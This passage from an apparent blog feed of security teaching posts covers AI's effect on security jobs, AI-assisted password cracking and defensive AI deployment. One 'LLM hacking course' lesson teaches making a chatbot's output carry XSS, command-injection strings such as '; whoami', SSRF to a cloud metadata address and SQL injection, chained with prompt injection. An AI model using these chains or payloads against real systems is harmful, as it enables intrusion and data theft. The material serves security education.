&lt;p&gt;Senior SOC Analysts:     tier-1 automated → demand for senior analysts grows&lt;br&gt;
Incident Responders:     better detection → more IR work, not less&lt;br&gt;
Penetration Testers:     AI tools increase output per tester → more valuable&lt;br&gt;
Security Architects:     AI adds new attack surfaces requiring architectural review&lt;/p&gt;

&lt;p&gt;securityelites.com&lt;/p&gt;

&lt;p&gt;Security Role Demand — AI Era Snapshot 2026&lt;/p&gt;

&lt;p&gt;Role&lt;br&gt;
Trend&lt;br&gt;
Reason&lt;br&gt;
AI Security Engineer&lt;br&gt;
↑↑ Growing&lt;br&gt;
New category&lt;br&gt;
AI Red Teamer&lt;br&gt;
↑↑ Growing&lt;br&gt;
High demand&lt;br&gt;
Senior SOC Analyst&lt;br&gt;
↑ Stable+&lt;br&gt;
AI amplified&lt;br&gt;
Penetration Tester&lt;br&gt;
↑ Growing&lt;br&gt;
AI-assisted&lt;br&gt;
Tier-1 SOC Analyst&lt;br&gt;
→ Flat&lt;br&gt;
Partial automation&lt;br&gt;
Basic Vuln Analyst&lt;br&gt;
↓ Slower&lt;br&gt;
Automating fast&lt;/p&gt;

&lt;p&gt;📸 Directional demand indicators for security roles in the AI era. These reflect the pattern across job boards and hiring conversations in 2025–2026. The overall security job market is growing — AI is reshaping where within security the demand sits, not eliminating it. Roles with AI-augmented productivity are growing; roles whose core function AI can fully automate are seeing slower replacement hiring.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tasks Most At Risk of Automation
&lt;/h2&gt;

&lt;p&gt;My honest assessment of the tasks where AI is most likely to reduce headcount over the next three to five years. I frame these as tasks rather than roles because most security roles involve a mix of automatable and non-automatable work — and the professionals who stay ahead actively migrate away from the automatable parts.&lt;/p&gt;

&lt;p&gt;TASKS AT HIGHEST AUTOMATION RISKCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Automating now (already in production)
&lt;/h1&gt;

&lt;p&gt;Basic vulnerability reporting:  scan → list → description (AI does this today)&lt;br&gt;
Compliance checklist execution: fixed checklists against known standards&lt;br&gt;
First-pass phishing review:     “is this email a phish?” → AI answers accurately&lt;br&gt;
Routine patch prioritisation:   CVSS + EPSS + asset context → AI-generated order&lt;/p&gt;

&lt;h1&gt;
  
  
  Lower automation risk — human expertise still leads
&lt;/h1&gt;

&lt;p&gt;Novel threat actor research:    TTPs and motivations require human analysis&lt;br&gt;
Complex incident response:      multi-stakeholder decisions with full business context&lt;br&gt;
Creative red team operations:   adversarial thinking, novel attack chains&lt;br&gt;
Security architecture:          trade-offs, alignment with specific business context&lt;br&gt;
Board/exec communication:       trust, relationships, risk framing for non-technical audiences&lt;/p&gt;

&lt;h2&gt;
  
  
  Skills That Matter Most Going Forward
&lt;/h2&gt;

&lt;p&gt;My guidance for security professionals planning their next three to five years: invest in skills AI augments, not skills AI replaces. The clearest pattern I see is that professionals who understand AI security — both as a capability and as an attack surface — command disproportionately high demand and salary premiums.&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/will-ai-replace-cybersecurity-jobs-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/will-ai-replace-cybersecurity-jobs-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>cybersecurityjobs</category>
      <category>replacingjobs</category>
      <category>securityautomation</category>
      <category>analyst</category>
    </item>
    <item>
      <title>Cracking Passwords using AI in 2026 - How AI Makes Weak Passwords Even More Dangerous</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Sun, 10 May 2026 14:21:38 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/cracking-passwords-using-ai-in-2026-how-ai-makes-weak-passwords-even-more-dangerous-32mb</link>
      <guid>https://forem.com/lucky_lonerusher/cracking-passwords-using-ai-in-2026-how-ai-makes-weak-passwords-even-more-dangerous-32mb</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/cracking-passwords-using-ai-in-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft78votqdui2nc1vwr36g.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft78votqdui2nc1vwr36g.webp" alt="Cracking Passwords using AI in 2026 - How AI Makes Weak Passwords Even More Dangerous" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A password that would have taken traditional cracking tools 5 years to crack by brute force can now be cracked in minutes using AI-assisted techniques. PassGAN — a neural network trained on real leaked passwords — generates new password guesses based on the patterns in billions of real passwords that people have actually used and exposed in breaches. This isn’t science fiction; it’s 2023 research from Home Security Heroes that has been replicated, extended, and incorporated into real-world attack tooling. Here’s what the research actually shows, what it means for your passwords, and how to check whether yours are at risk.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;How Cracking passwords using AI works — PassGAN and beyond&lt;br&gt;
What the research actually shows vs what was overstated&lt;br&gt;
Which password patterns AI cracks fastest&lt;br&gt;
How to check if your passwords are already exposed&lt;br&gt;
What makes a password genuinely resistant to AI cracking in 2026&lt;/p&gt;

&lt;p&gt;⏱️ 10 min read ### Cracking Passwords using AI in 2026 – Complete Guide 1. How AI Password Cracking Works 2. PassGAN — The Research Explained 3. Which Passwords Are Most Vulnerable 4. How to Check Your Passwords Right Now 5. What Makes a Password AI-Resistant Check if your specific passwords are already in breach databases — my recommendation is to run this check on your five most-used passwords right now, using the &lt;a href="https://dev.to/tools/password-breach-checker/"&gt;Password Breach Checker&lt;/a&gt; — free, uses k-Anonymity so your actual password is never transmitted. Also check the &lt;a href="https://dev.to/tools/password-strength-checker/"&gt;Password Strength Checker&lt;/a&gt; to see how your passwords score against current cracking estimates.&lt;/p&gt;

&lt;h2&gt;
  
  
  How Cracking Passwords using AI in 2026 Works
&lt;/h2&gt;

&lt;p&gt;Traditional password cracking uses wordlists (dictionaries of common passwords and leaked passwords) and rule-based mutations (adding numbers, capitalising letters, substituting characters). AI password cracking learns the statistical patterns of how real humans create passwords — and generates new guesses that match those patterns rather than just testing a fixed list. My explanation of why this matters: it means AI can crack passwords that have never appeared in any breach database, simply by understanding how people typically modify base words.&lt;/p&gt;

&lt;p&gt;TRADITIONAL VS AI PASSWORD CRACKINGCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Traditional wordlist approach
&lt;/h1&gt;

&lt;p&gt;Hashcat + rockyou.txt: test every known leaked password against a hash&lt;br&gt;
Rule-based mutations: password → Password → P@ssword → P@ssw0rd&lt;br&gt;
Limitation: only finds passwords similar to those already in the wordlist&lt;/p&gt;

&lt;h1&gt;
  
  
  AI-assisted approach (PassGAN and similar)
&lt;/h1&gt;

&lt;p&gt;Trained on: billions of real leaked passwords from breach databases&lt;br&gt;
Learns: statistical patterns — how humans modify base words, common suffixes&lt;br&gt;
Generates: new password candidates matching human creation patterns&lt;br&gt;
Advantage: finds passwords similar to real human choices, not just known ones&lt;/p&gt;

&lt;h1&gt;
  
  
  What AI adds to credential stuffing
&lt;/h1&gt;

&lt;p&gt;Password variation prediction: if “Summer2019!” is leaked, AI predicts “Summer2023!”&lt;br&gt;
Cross-site variation: if password is “Netflix123!” AI tries “Amazon123!” on other sites&lt;br&gt;
Personal targeting: AI trained on leaked data about specific person generates personalised guesses&lt;/p&gt;

&lt;h2&gt;
  
  
  PassGAN — The Research Explained
&lt;/h2&gt;

&lt;p&gt;The PassGAN research from Home Security Heroes (2023) received significant media coverage, some of which overstated the results. My honest reading of what the research actually showed versus what the headlines claimed.&lt;/p&gt;

&lt;p&gt;PASSGAN RESEARCH — WHAT IT ACTUALLY SHOWEDCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  What PassGAN is
&lt;/h1&gt;

&lt;p&gt;A GAN (Generative Adversarial Network) trained on 15.6 million real leaked passwords&lt;br&gt;
Generates new password guesses without explicit rules — learned from pattern data&lt;br&gt;
Published: 2022 academic research, popularised by Home Security Heroes study 2023&lt;/p&gt;

&lt;h1&gt;
  
  
  What the 2023 study found
&lt;/h1&gt;

&lt;p&gt;51% of common passwords cracked in under 1 minute&lt;br&gt;
65% cracked in under 1 hour&lt;br&gt;
81% cracked in under 1 month&lt;br&gt;
Important context: these were passwords from common password lists, not random unique ones&lt;/p&gt;

&lt;h1&gt;
  
  
  What was overstated in media coverage
&lt;/h1&gt;

&lt;p&gt;Headlines implied PassGAN could crack any password in minutes — not accurate&lt;br&gt;
Long, random passwords (12+ characters, mixed types) still take impractical time&lt;br&gt;
The speed depends heavily on how passwords are hashed — bcrypt is far more resistant&lt;/p&gt;

&lt;h1&gt;
  
  
  What it genuinely showed
&lt;/h1&gt;

&lt;p&gt;Human-pattern passwords (words, names, dates with common substitutions) are at risk&lt;br&gt;
AI outperforms traditional tools on human-created password patterns&lt;br&gt;
The gap between “memorable human password” and “crackable password” has narrowed significantly&lt;/p&gt;

&lt;h2&gt;
  
  
  Which Passwords Are Most Vulnerable
&lt;/h2&gt;

&lt;p&gt;PASSWORD VULNERABILITY BY PATTERNCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Highly vulnerable to AI cracking
&lt;/h1&gt;

&lt;p&gt;Any word + year:          Summer2019! · Football2024 · Password2023&lt;br&gt;
Name + numbers:           Sarah1234 · John2024 · Mike123!&lt;br&gt;
Common substitutions:     P@ssw0rd · S3cur1ty · L0v3you&lt;br&gt;
Keyboard patterns:        qwerty123 · 1qaz2wsx · asdfgh&lt;br&gt;
Word combinations (&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/cracking-passwords-using-ai-in-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/cracking-passwords-using-ai-in-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ybersecurity</category>
      <category>passwordcracking</category>
      <category>bruteforceattacks</category>
      <category>ass2026</category>
    </item>
    <item>
      <title>LLM05 Improper Output Handling 2026 — XSS, RCE and SSRF via AI Output | AI LLM Hacking Course Day 9</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Sun, 10 May 2026 12:26:42 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/llm05-improper-output-handling-2026-xss-rce-and-ssrf-via-ai-output-ai-llm-hacking-course-day-9-lcd</link>
      <guid>https://forem.com/lucky_lonerusher/llm05-improper-output-handling-2026-xss-rce-and-ssrf-via-ai-output-ai-llm-hacking-course-day-9-lcd</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/ai-llm-day-9-llm05-improper-output-handling/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7vujwzeknrxk9cum4dki.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7vujwzeknrxk9cum4dki.webp" alt="LLM05 Improper Output Handling 2026 — XSS, RCE and SSRF via AI Output | AI LLM Hacking Course Day 9" width="800" height="419"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;🤖 AI/LLM HACKING COURSE&lt;/p&gt;

&lt;p&gt;FREE&lt;/p&gt;

&lt;p&gt;Part of the &lt;a href="https://dev.to/ai-llm-hacking-course/"&gt;AI/LLM Hacking Course — 90 Days&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Day 9 of 90 · 10% complete&lt;/p&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Authorised Targets Only:&lt;/strong&gt; Testing for XSS, RCE, and SSRF via LLM output must only be performed against systems you have explicit written authorisation to test. Never execute or trigger payloads against production systems beyond what is necessary to confirm a finding exists. SecurityElites.com accepts no liability for misuse.&lt;/p&gt;

&lt;p&gt;A developer showed me their new AI customer support tool with genuine pride. It pulled knowledge base articles, summarised them in natural language, and rendered the response directly in the chat window as formatted HTML. It looked clean. It worked well. I spent thirty seconds typing a prompt and produced a response containing a script tag that executed in the next user’s browser who saw the conversation. The developer had sanitised user input carefully. Nobody had thought to sanitise the AI’s output.&lt;/p&gt;

&lt;p&gt;LLM05 Improper Output Handling is the vulnerability class that catches developers who protect the front door but forget the back window. They validate and sanitise everything that goes into the model. They never question what comes out. The model’s output passes to a web browser, a code interpreter, a shell command, or a database query — directly, without the encoding or parameterisation that every security training course teaches for user input. The AI output is trusted implicitly because the AI is part of the application. Day 9 covers every downstream context where that implicit trust creates a critical vulnerability — and the prompt injection chain that weaponises it without the target application ever receiving a malicious user input.&lt;/p&gt;

&lt;h3&gt;
  
  
  🎯 What You’ll Master in Day 9
&lt;/h3&gt;

&lt;p&gt;Map every downstream consumer of LLM output as a potential LLM05 attack surface&lt;br&gt;
Execute XSS via LLM output in applications that render AI responses as HTML&lt;br&gt;
Chain LLM01 prompt injection with LLM05 to produce attacker-controlled output execution&lt;br&gt;
Test for RCE via auto-executed AI-generated code in coding assistant tools&lt;br&gt;
Demonstrate SSRF via LLM-suggested URLs in server-side fetch contexts&lt;br&gt;
Write complete LLM05 findings with the correct output-layer CVSS scoring&lt;/p&gt;

&lt;p&gt;⏱️ Day 9 · 3 exercises · Browser + Think Like Hacker + Kali Terminal ### ✅ Prerequisites - Day 4 — LLM01 Prompt Injection — the LLM01 + LLM05 attack chain requires the injection techniques from Day 4 to control AI output content - Basic XSS knowledge — understanding how script tags execute in browsers and what htmlspecialchars prevents - Burp Suite installed — intercepting the AI response before it reaches the browser is how you confirm the output handling vulnerability exists ### 📋 LLM05 Improper Output Handling — Day 9 Contents 1. Mapping Downstream Output Consumers 2. XSS via LLM Output — The HTML Rendering Attack 3. RCE via Auto-Executed Code Output 4. SSRF via LLM-Generated URLs 5. SQL Injection via AI-Generated Query Content 6. The LLM01 + LLM05 Complete Attack Chain In &lt;a href="https://dev.to/ai-llm-day-8-llm04-data-model-poisoning/"&gt;Day 8&lt;/a&gt; you attacked the training phase. Day 9 comes back to the deployed application — specifically what happens after the model generates a response. Every system that receives AI output without treating it as untrusted input is an LLM05 surface. &lt;a href="https://dev.to/ai-llm-day-10-llm06-excessive-agency/"&gt;Day 10&lt;/a&gt; takes this further into LLM06, where the downstream system isn’t a passive renderer but an agent that can take real-world actions.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mapping Downstream Output Consumers
&lt;/h2&gt;

&lt;p&gt;Before testing anything, map every system that receives LLM output. The attack surface is entirely determined by what those systems do with the content. Plain text display? Minimal risk — nowhere for a payload to execute. HTML rendering, code execution, shell commands, database queries? Very different story. The vulnerability isn’t in the model. It’s in whatever happens to the model’s output after it leaves the API.&lt;/p&gt;

&lt;p&gt;LLM05 ATTACK SURFACE — OUTPUT CONSUMER MAPCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 1: Web browser rendering HTML
&lt;/h1&gt;

&lt;p&gt;Risk: XSS if output rendered without encoding&lt;br&gt;
Test: prompt AI to include alert(1) in response&lt;br&gt;
Evidence: script executes in browser = confirmed XSS&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 2: Code interpreter / execution engine
&lt;/h1&gt;

&lt;p&gt;Risk: RCE if AI-generated code executed without review&lt;br&gt;
Test: prompt AI to include system command in generated code&lt;br&gt;
Evidence: command executes = confirmed RCE&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 3: Server-side HTTP client (URL fetcher)
&lt;/h1&gt;

&lt;p&gt;Risk: SSRF if server fetches AI-suggested URLs&lt;br&gt;
Test: prompt AI to suggest &lt;a href="http://169.254.169.254/" rel="noopener noreferrer"&gt;http://169.254.169.254/&lt;/a&gt; as a URL to check&lt;br&gt;
Evidence: metadata returned = confirmed SSRF&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 4: Database query builder
&lt;/h1&gt;

&lt;p&gt;Risk: SQL injection if AI output interpolated into queries&lt;br&gt;
Test: prompt AI to include SQL syntax in generated content&lt;br&gt;
Evidence: query alters database = confirmed SQLi&lt;/p&gt;

&lt;h1&gt;
  
  
  Consumer 5: OS shell / command executor
&lt;/h1&gt;

&lt;p&gt;Risk: command injection if AI output passed to shell&lt;br&gt;
Test: prompt AI to include ; whoami or | id in its output&lt;br&gt;
Evidence: OS command executes = confirmed command injection&lt;/p&gt;

&lt;h1&gt;
  
  
  How to identify consumers — look for these in source code:
&lt;/h1&gt;

&lt;p&gt;innerHTML = llm_response          # XSS surface&lt;br&gt;
exec(llm_response)                # RCE surface&lt;br&gt;
requests.get(llm_response)        # SSRF surface&lt;br&gt;
cursor.execute(f”… {llm_output}”) # SQLi surface&lt;br&gt;
subprocess.run(llm_response, shell=True) # Command injection&lt;/p&gt;

&lt;p&gt;🛠️ EXERCISE 1 — BROWSER (20 MIN · AUTHORISED TARGETS)&lt;br&gt;
Find and Confirm XSS via LLM Output on an Authorised Target&lt;/p&gt;

&lt;p&gt;⏱️ &lt;strong&gt;20 minutes · Browser + Burp Suite · Authorised target&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/ai-llm-day-9-llm05-improper-output-handling/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/ai-llm-day-9-llm05-improper-output-handling/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aixssvulnerability</category>
      <category>llmcodeexecution</category>
      <category>llmgeneratedxss</category>
      <category>lmoutputinjection</category>
    </item>
    <item>
      <title>How to Use AI for Cybersecurity Without Creating New Risks in 2026</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Wed, 06 May 2026 13:50:40 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/how-to-use-ai-for-cybersecurity-without-creating-new-risks-in-2026-2496</link>
      <guid>https://forem.com/lucky_lonerusher/how-to-use-ai-for-cybersecurity-without-creating-new-risks-in-2026-2496</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/how-to-use-ai-for-cybersecurity-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2egqtvnbq1vhk7kas5lu.webp" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2egqtvnbq1vhk7kas5lu.webp" alt="How to Use AI for Cybersecurity Without Creating New Risks in 2026" width="800" height="534"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AI is the most significant capability change in defensive security since endpoint detection and response emerged as a category. My experience over the past two years is that the organisations getting the most value from AI security tools share a common characteristic: they defined measurable success criteria before deployment, not after. The organisations I work with that are getting the most value from AI security tools share a common pattern: they deployed AI to augment existing capabilities rather than replace them, they defined governance before they deployed, and they measured outcomes rather than assuming AI meant improvement. Here is the practical guide to using AI in your security programme without creating the new risks that unmanaged AI adoption introduces.&lt;/p&gt;

&lt;h3&gt;
  
  
  What You’ll Learn
&lt;/h3&gt;

&lt;p&gt;Where AI adds genuine value in security operations — and where it doesn’t&lt;br&gt;
SIEM and SOC AI integration — what to look for and how to evaluate&lt;br&gt;
AI-assisted threat detection and phishing defence in practice&lt;br&gt;
The governance framework you need before deploying AI tools&lt;br&gt;
The risks of AI security tools that most evaluations miss&lt;/p&gt;

&lt;p&gt;⏱️ 12 min read ### How to Use AI for Cybersecurity — Practical Guide 1. Where AI Genuinely Helps in Security 2. SIEM and SOC AI Integration 3. AI Threat Detection — Practical Evaluation 4. AI Phishing Defence 5. Governance Before Deployment The offensive side of AI in security — how attackers use AI against you — is covered in the &lt;a href="https://dev.to/ai-in-hacking/"&gt;AI Security series&lt;/a&gt; and the &lt;a href="https://dev.to/nation-state-ai-cyberwarfare-2026/"&gt;Nation-State AI Cyberwarfare guide&lt;/a&gt;. My focus here is the defensive deployment side. The &lt;a href="https://dev.to/ai-red-teaming-guide-2026/"&gt;AI Red Teaming Guide&lt;/a&gt; covers how to assess AI security tools for vulnerabilities before deploying them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where AI Genuinely Helps in Security
&lt;/h2&gt;

&lt;p&gt;My framework for evaluating AI security tools starts with the question: what human bottleneck does this address? AI in security adds most value where the volume of data exceeds human processing capacity, where pattern recognition across large datasets matters, or where speed of response is critical. It adds least value where human judgment, context, and relationship are the core competency.&lt;/p&gt;

&lt;p&gt;WHERE AI HELPS VS WHERE IT DOESN’TCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  High value — AI genuinely accelerates
&lt;/h1&gt;

&lt;p&gt;Log analysis:         millions of events → AI surfaces anomalies humans would miss&lt;br&gt;
Threat intelligence:  AI synthesises feeds, CVEs, IOCs at scale&lt;br&gt;
Alert triage:         AI pre-scores alerts → analysts focus on highest risk&lt;br&gt;
Phishing detection:   AI classifies email patterns at inbox volume&lt;br&gt;
Malware analysis:     AI identifies malware families and behaviours at scale&lt;/p&gt;

&lt;h1&gt;
  
  
  Lower value — human judgment still leads
&lt;/h1&gt;

&lt;p&gt;Incident response decisions:   context, business risk, communication — human&lt;br&gt;
Client/stakeholder communication: nuance, trust, relationship — human&lt;br&gt;
Novel threat actor TTPs:  AI trained on past patterns — novel TTPs are a gap&lt;br&gt;
Regulatory and legal judgments: always human, AI supports drafting only&lt;/p&gt;

&lt;h1&gt;
  
  
  The most impactful AI security use cases in 2026
&lt;/h1&gt;

&lt;ol&gt;
&lt;li&gt;AI-assisted alert triage in SIEMs: proven ROI in analyst time saved&lt;/li&gt;
&lt;li&gt;AI email filtering: state-of-the-art phishing detection at enterprise scale&lt;/li&gt;
&lt;li&gt;AI security copilots: natural language queries against log data and telemetry&lt;/li&gt;
&lt;li&gt;AI vulnerability prioritisation: combining CVSS + EPSS + asset context&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  SIEM and SOC AI Integration
&lt;/h2&gt;

&lt;p&gt;Every major SIEM vendor has added AI capabilities in the past two years. My evaluation framework for AI-enhanced SIEM features focuses on measurable outcomes — specifically alert volume reduction, false positive rate, and mean time to detection — rather than vendor capability claims.&lt;/p&gt;

&lt;p&gt;AI SIEM EVALUATION FRAMEWORKCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  What to measure (not what vendors claim)
&lt;/h1&gt;

&lt;p&gt;Alert volume:           does AI reduce alerts to analyst? By how much?&lt;br&gt;
False positive rate:    what % of AI-surfaced alerts are genuine? Track this.&lt;br&gt;
Mean time to detect:    does AI improve MTTD on real incidents vs baseline?&lt;br&gt;
Coverage gaps:          what attack techniques does the AI not detect?&lt;/p&gt;

&lt;h1&gt;
  
  
  AI security copilot features to evaluate
&lt;/h1&gt;

&lt;p&gt;Natural language queries: “show me all lateral movement activity in the last 24h”&lt;br&gt;
Automated investigation: AI correlates related alerts into a single incident&lt;br&gt;
Contextual enrichment:  AI adds threat intel context to raw alerts automatically&lt;br&gt;
Guided remediation:     AI suggests response steps for specific alert types&lt;/p&gt;

&lt;h1&gt;
  
  
  Microsoft Sentinel, Splunk SIEM, Elastic + AI features (2025/2026)
&lt;/h1&gt;

&lt;p&gt;Microsoft Sentinel: Copilot for Security integration — natural language SOC queries&lt;br&gt;
Splunk: AI-driven alert grouping, automated playbook suggestions&lt;br&gt;
Elastic: ML-based anomaly detection, LLM-powered analyst assistant&lt;/p&gt;

&lt;h2&gt;
  
  
  AI Threat Detection — Practical Evaluation
&lt;/h2&gt;

&lt;p&gt;My approach to evaluating AI threat detection tools: never accept vendor benchmark claims — test against your environment with your data. The AI models that perform well on industry benchmarks often perform differently on your specific telemetry because they were trained on different environments. Run a 30-day parallel evaluation before any deployment decision.&lt;/p&gt;

&lt;p&gt;AI THREAT DETECTION — EVALUATION CHECKLISTCopy&lt;/p&gt;

&lt;h1&gt;
  
  
  30-day evaluation requirements
&lt;/h1&gt;

&lt;p&gt;Run parallel: existing controls AND new AI tool simultaneously — compare outputs&lt;br&gt;
Use red team exercises: does the AI detect your own pen testers? Does existing SIEM?&lt;br&gt;
Count false positives: every false positive has a cost (analyst time, alert fatigue)&lt;br&gt;
Test MITRE ATT&amp;amp;CK coverage: which techniques does the AI detect vs miss?&lt;/p&gt;

&lt;h1&gt;
  
  
  Questions to ask vendors
&lt;/h1&gt;

&lt;p&gt;What training data was the model trained on? Relevant to your environment?&lt;br&gt;
How often is the model retrained? Threat landscape evolves — stale models miss new TTPs&lt;br&gt;
What is your false positive rate on comparable environments?&lt;br&gt;
How does the model handle novel/unknown attack techniques?&lt;/p&gt;




&lt;h2&gt;
  
  
  📖 Read the complete guide on Securityelites — AI Red Team Education
&lt;/h2&gt;

&lt;p&gt;This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. &lt;strong&gt;&lt;a href="https://securityelites.com/how-to-use-ai-for-cybersecurity-2026/" rel="noopener noreferrer"&gt;Read the full article on Securityelites — AI Red Team Education →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally written and published by the Securityelites — AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit &lt;a href="https://securityelites.com/how-to-use-ai-for-cybersecurity-2026/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>aicybersecurity2026</category>
      <category>hreatetection</category>
      <category>phishingdetectionai</category>
      <category>secureaideployment</category>
    </item>
    <item>
      <title>LLM04 Data Model Poisoning 2026 — Corrupting AI From the Training Phase | AI LLM Hacking Class Day 8</title>
      <dc:creator>Mr Elite</dc:creator>
      <pubDate>Wed, 06 May 2026 11:06:19 +0000</pubDate>
      <link>https://forem.com/lucky_lonerusher/llm04-data-model-poisoning-2026-corrupting-ai-from-the-training-phase-ai-llm-hacking-class-day-8-3kaj</link>
      <guid>https://forem.com/lucky_lonerusher/llm04-data-model-poisoning-2026-corrupting-ai-from-the-training-phase-ai-llm-hacking-class-day-8-3kaj</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;📰 Originally published on &lt;a href="https://securityelites.com/ai-llm-day-8-llm04-data-model-poisoning/" rel="noopener noreferrer"&gt;Securityelites — AI Red Team Education&lt;/a&gt;&lt;/strong&gt; — the canonical, fully-updated version of this article.&lt;/p&gt;
&lt;/blockquote&gt;

